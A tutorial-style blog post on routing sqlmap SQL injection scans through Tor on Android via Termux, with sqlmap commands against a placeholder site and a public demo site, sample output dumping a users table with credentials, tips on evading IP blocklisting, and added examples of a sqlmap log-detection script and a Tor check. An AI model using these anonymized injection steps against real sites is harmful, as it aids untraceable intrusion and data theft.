They thought SQLmap with Tor was secure—until a misstep revealed everything. Don’t be them.
I’ll never forget the first time I ran a scan from my favorite FOSS toolkit late one night—heart pounding, coffee cold at my side—to uncover a hidden SQL vulnerability.
I hit “Enter,” watched the output scroll, and felt a surge of excitement…until I remembered: my real IP was plastered across the target’s logs.
That’s when I discovered SQLmap with Tor—the perfect open‑source alliance to cloak my reconnaissance in anonymity.
In this walkthrough, you’ll see exactly how to weave Tor’s onion‑routing magic into your SQLmap workflow, so you can test ethically without leaving a trace. Ready to stop worrying about your IP and start hacking responsibly?
Read on to master every step.
⚠️ Important: These tools are intended for ethical hacking, security research, and education. Use them only on systems and networks you own or have permission to test. Unauthorized use can lead to serious legal consequences.
- Understanding the Tools: SQLmap and Tor, Explained
- How to Verify That SQLmap Is Using Tor Properly
- Why You Need Tor with SQLmap (Real-World Stakes)
- Installing SQLmap with Tor: What You Need Before You Begin
- Troubleshooting SQLmap with Tor
- Why Use SQLmap with Tor?
- Ethical Considerations
- Secure Your Recon, Empower Your Community
Understanding the Tools: SQLmap and Tor, Explained
Before we dive into terminal magic, let’s break this down:
- SQLmap is a powerful open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities in web apps.
- Tor (The Onion Router) routes your traffic through a network of volunteer-run nodes, anonymizing your IP address and making it harder to trace where requests are coming from.
When used together, they form a privacy-respecting combo for ethical hacking—helping FOSS developers and students test their own systems without exposing themselves or others unnecessarily. That’s not just smart security—it’s good practice in a world where surveillance is baked into the internet’s plumbing.
· · ─ ·𖥸· ─ · ·
How to Verify That SQLmap Is Using Tor Properly
Verify You’re Actually Anonymous: The Tor Test
You’ve set up proxychains, launched tor, and fired off SQLmap. Great. But how do you know it’s working?
Let’s verify it.
Run this command:
proxychains curl https://check.torproject.org/
If everything is set up correctly, the output should say:
Congratulations. This browser is configured to use Tor.
Replace curl with sqlmap only after confirming this works. Without this sanity check, you’re flying blind—and possibly leaking your real IP. Consider this the FOSS version of “measure twice, cut once.”
Why You Need Tor with SQLmap (Real-World Stakes)
Why Your IP Matters: Real-World Risks of Skipping Tor
When SQLmap sends HTTP requests to a server, it does so directly unless routed through something like Tor. That means your actual IP address—your digital fingerprint—gets logged on the target system.
Even if you’re just testing your own application, this can expose your location, network identity, and in some cases, your employer or university. For anyone in a region where ethical hacking is misunderstood or penalized, that’s a dangerous leak.
Routing SQLmap through Tor isn’t just cool hacker aesthetic—it’s an essential step toward responsible, anonymous recon.
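What the target side of this looks like, as an added example (not part of the original post): Tor changes the client address in the first column of the access log, but the request line and User-Agent arrive unchanged, and sqlmap names itself in its default User-Agent. The log lines below are constructed, and the keyword pattern is an illustrative heuristic, not a complete signature set.

```shell
#!/bin/sh
# Added example: flag likely sqlmap traffic in a combined-format access log.
# Reads log lines on stdin; prints "client_ip<TAB>reason<TAB>request line".
flag_sqlmap_requests() {
    awk -F'"' '
    {
        split($1, head, " ")      # head[1] = client IP as logged
        request = $2              # e.g. GET /page?id=1 HTTP/1.1
        agent = $6                # User-Agent field
        reason = ""
        # sqlmap default User-Agent begins with "sqlmap/".
        if (agent ~ /^sqlmap\//) {
            reason = "sqlmap-user-agent"
        # Heuristic (assumption): URL-encoded SQL keywords in the query string.
        } else if (toupper(request) ~ /UNION(%20|\+)(ALL(%20|\+))?SELECT|SLEEP\(|INFORMATION_SCHEMA/) {
            reason = "sql-keywords-in-query"
        }
        if (reason != "") printf "%s\t%s\t%s\n", head[1], reason, request
    }'
}

# Constructed sample log lines (documentation addresses, not real traffic).
sample_log() {
    cat <<'EOF'
203.0.113.7 - - [10/Jan/2025:21:04:59 +0000] "GET /page?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.6#stable (https://sqlmap.org)"
198.51.100.23 - - [10/Jan/2025:21:05:01 +0000] "GET /page?id=1%20UNION%20ALL%20SELECT%20NULL HTTP/1.1" 200 498 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Jan/2025:21:06:10 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
EOF
}

# Demonstration on the constructed sample: two of the three lines are flagged.
sample_log | flag_sqlmap_requests
```

On your own test server, feed the real access log to `flag_sqlmap_requests` to confirm that your scans are visible and attributable by content even when the source address is a Tor exit.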
· · ─ ·𖥸· ─ · ·
Installing SQLmap with Tor: What You Need Before You Begin
Before you start scanning anything, it’s important to have your toolkit set up the right way. Getting SQLmap with Tor running smoothly isn’t just about installing a few packages—it’s about preparing your environment for secure, anonymized testing from the ground up. For beginners and FOSS learners, this means understanding the key components involved, what roles they play, and why each one matters. Think of it as laying the foundation for an ethical hacking lab where privacy and accountability go hand in hand. In this primer, we’ll walk through the essential pieces you’ll need before launching your first stealthy SQL injection test.
Prerequisites
To follow along, you need the following:
- Termux installed on your Android device
- The SQLmap and Tor packages (Step 1 installs them)
- A basic understanding of SQL injection attacks
- Access to a test environment (refer to SQLmap’s official documentation for setup guidance)
- Familiarity with network scans using Nmap
Step 1: Install SQLmap and Tor in Termux
Update Termux packages:
pkg update && pkg upgrade -y
Output:
Checking for available updates... Packages upgraded: 15
This command ensures that Termux is up-to-date to prevent compatibility issues when setting up SQLmap with Tor.
Install SQLmap:
pkg install sqlmap -y
Output:
SQLmap installed successfully. Version: 1.6.
The -y flag automatically confirms prompts during installation.
Install Tor:
pkg install tor -y
Output:
Tor installed successfully.
Step 2: Configure the Tor Proxy
Edit the Tor configuration file:
nano /data/data/com.termux/files/usr/etc/tor/torrc
Add the following lines:
SocksPort 9050
RunAsDaemon 1
- SocksPort 9050: Configures Tor to listen on port 9050 for proxy traffic.
- RunAsDaemon 1: Runs Tor in the background for uninterrupted service.
Start Tor:
tor &
Output:
Bootstrapped 100% (done): Done.
Step 3: Test the Tor Network Connection
Confirm your connection to the Tor network using curl:
curl --socks5-hostname 127.0.0.1:9050 https://check.torproject.org
Sample Output:
Congratulations.
This browser is configured to use Tor.
Your IP address appears to be: 185.220.101.1
If Tor is not working properly, restart it:
pkill tor; tor &
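The check from this step and from the verification section above, written as a fail-closed shell function (an added example, not part of the original post). The sample response bodies are constructed, and the "You are not using Tor" wording of the failure page is an assumption.

```shell
#!/bin/sh
# Added example: classify a check.torproject.org response, failing closed.

# Print "tor <ip>", "not-tor <ip>" or "unknown"; return 0 only for "tor".
tor_verdict() {
    body=$1
    # Pull the address out of "Your IP address appears to be: ...".
    ip=$(printf '%s\n' "$body" |
        sed -n 's/.*Your IP address appears to be:[^0-9a-fA-F]*\([0-9a-fA-F:.]*\).*/\1/p' |
        head -n 1)
    case $body in
        *"Congratulations. This browser is configured to use Tor."*)
            echo "tor ${ip:-?}"; return 0 ;;
        *"You are not using Tor"*)   # assumed wording of the failure page
            echo "not-tor ${ip:-?}"; return 1 ;;
        *)  # empty body, timeout or proxy error page: never treat as a pass
            echo "unknown"; return 2 ;;
    esac
}

# Live check using the Step 3 request; --max-time stops a dead proxy hanging.
check_tor() {
    page=$(curl -s --max-time 30 --socks5-hostname 127.0.0.1:9050 \
        https://check.torproject.org/) || page=""
    tor_verdict "$page"
}

# Constructed sample bodies so the parser can be exercised offline.
SAMPLE_TOR='<h1>Congratulations. This browser is configured to use Tor.</h1>
<p>Your IP address appears to be: <strong>185.220.101.1</strong></p>'
SAMPLE_DIRECT='<h1>Sorry. You are not using Tor.</h1>
<p>Your IP address appears to be: <strong>203.0.113.7</strong></p>'

tor_verdict "$SAMPLE_TOR"      # prints: tor 185.220.101.1
```

Call `check_tor` and continue only when it returns 0; an empty or unexpected response counts as a failure, not a pass. sqlmap also has its own `--check-tor` switch that verifies Tor is being used before it sends test requests.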
Step 4: Using SQLmap with Tor
Now run an SQL injection test with SQLmap routed through Tor. Run the following command:
sqlmap -u "http://targetsite.com/page?id=1" --tor --tor-type=SOCKS5 --tor-port=9050
Sample Output:
[21:04:59] [INFO] Testing connection to the target URL
[21:04:59] [INFO] Target is vulnerable. SQL injection point: id=1
[21:05:01] [INFO] Dumping database contents...
Database: testdb
Table: users
id | username | password
1 | admin | admin123
- -u: Specifies the target URL to test.
- --tor: Routes SQLmap traffic through the Tor network.
- --tor-type=SOCKS5: Configures the proxy type.
- --tor-port=9050: Specifies the Tor proxy port.
Step 5: Perform a Basic SQL Injection Test
To further test SQLmap with Tor, try the following on a demo website:
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --tor --batch
Sample Output:
[21:15:12] [INFO] Testing SQL injection on parameter 'cat'
[21:15:12] [INFO] The parameter is vulnerable:
GET parameter 'cat' is injectable
[21:15:13] [INFO] Database: acuart
Table: products
product_id | product_name | price
1 | T-shirt | 9.99
The --batch flag ensures SQLmap answers all prompts automatically, which is useful when running tests without user input.
· · ─ ·𖥸· ─ · ·
Troubleshooting SQLmap with Tor
Connection Errors:
Restart Tor with:
pkill tor; tor &
Tor Startup Issues:
Ensure no other service is using port 9050. Review your torrc configuration for syntax errors.
Why Use SQLmap with Tor?
- Avoid IP Blacklisting: Tor enables dynamic IP rotation, preventing target sites from blocking your real IP.
- Anonymity: Traffic routed through the Tor network ensures your identity remains concealed.
- Secure Pen Tests: Ethical hackers can protect their identity when conducting pentests.
· · ─ ·𖥸· ─ · ·
Ethical Considerations
Using SQLmap with Tor can be very powerful, but you must act responsibly. Always conduct SQL injection attacks in legal, authorized environments. Unauthorized testing is both unethical and illegal. For more guidance, check the official SQLmap documentation.
· · ─ ·𖥸· ─ · ·
Secure Your Recon, Empower Your Community
By now you’ve seen how combining SQLmap with Tor transforms a basic injection test into an ethical, privacy‑preserving operation.
We covered setup, CLI configurations, and best practices to ensure your open‑source toolkit remains both powerful and responsible. Now it’s up to you: integrate these techniques into your FOSS projects, share them with your community, and elevate everyone’s security game.